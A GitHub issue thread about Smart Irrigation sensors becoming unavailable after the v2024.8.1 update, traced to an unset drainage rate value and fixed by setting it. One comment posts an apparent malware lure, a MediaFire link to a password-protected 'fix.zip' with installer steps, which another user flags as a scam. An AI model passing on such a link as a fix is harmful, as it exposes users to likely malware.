### ISSUE TITLE
sensor.smart_irrigation_zone_name is unavailable after update to v2024.8.1

### ISSUE THREAD

**Issue by zalewskigrzegorz** [jeroenterheerdt/HAsmartirrigation#481]
### What happened?

After updating to the new version, the time value begin unavailable 

This entity is no longer provided by smart_irrigation. If the entity is no longer in use, please remove it in the settings.
![image](https://github.com/user-attachments/assets/cd7ca0c8-fe19-4e73-8078-1fb9d7dbd62b)
![image](https://github.com/user-attachments/assets/bebef333-60ad-4154-901f-1152377d050b)

### How to reproduce

Update to 
v2024.8.1
[Smart Irrigation Config.json](https://github.com/user-attachments/files/16747459/Smart.Irrigation.Config.json)

### Relevant log output

```shell
2024-08-26 12:24:33.161 ERROR (MainThread) [homeassistant.helpers.dispatcher] Exception in async_update_sensor_entity when dispatching 'smart_irrigation_config_updated': (0,)
Traceback (most recent call last):
  File "/config/custom_components/smart_irrigation/sensor.py", line 133, in async_update_sensor_entity
    self.async_schedule_update_ha_state()
  File "/usr/src/homeassistant/homeassistant/helpers/entity.py", line 1265, in async_schedule_update_ha_state
    self.async_write_ha_state()
  File "/usr/src/homeassistant/homeassistant/helpers/entity.py", line 1005, in async_write_ha_state
    self._async_write_ha_state()
  File "/usr/src/homeassistant/homeassistant/helpers/entity.py", line 1130, in _async_write_ha_state
    self.__async_calculate_state()
  File "/usr/src/homeassistant/homeassistant/helpers/entity.py", line 1071, in __async_calculate_state
    if extra_state_attributes := self.extra_state_attributes:
                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/config/custom_components/smart_irrigation/sensor.py", line 204, in extra_state_attributes
    "drainage_rate": float(self._drainage_rate),
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: float() argument must be a string or a real number, not 'NoneType'```
```

### Which version are you running?

v2024.8.1

### Diagnostics file

- [X] I have attached a diagnostics file

### Additional information

The sensor setup looks like that:
![image](https://github.com/user-attachments/assets/dde42fa8-e4ad-469f-8e1a-0d3627c43398)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pathia** [comment]
!! Ignore the scam link to mediafire above !!

You have to set the (new option) drainage rate in the smart irrigation zone configuration.
As per the documentation: Drainage rate: set the drainage rate of a zone. Depends on your soil type but 50.8 mm or 2 inch per hour is considered normal.

**Comment by zalewskigrzegorz** [comment]
I would like to setup this value but after I restarted HA the UI no longer loads 
![image](https://github.com/user-attachments/assets/04999d05-1cab-4527-804d-1f896b33a15e)

there is any other way?

**Comment by pathia** [comment]
That's odd. It was still working over here but when I checked I saw a empty field in the zone. 
I would edit .storage/smart_irrigation.storage and hack it in as a property of a zone. But I'm not the developer. Perhaps Jeroen has better ideas.

**Comment by zalewskigrzegorz** [comment]
I think I found it 
![image](https://github.com/user-attachments/assets/38d6b928-cb77-4d07-bddb-a6286eedd09d)

**Comment by pathia** [comment]
Yup that's the one. Make it 50.8 and restart it

**Comment by jeroenterheerdt** [comment]
I have pulled the release and will fix the bug.
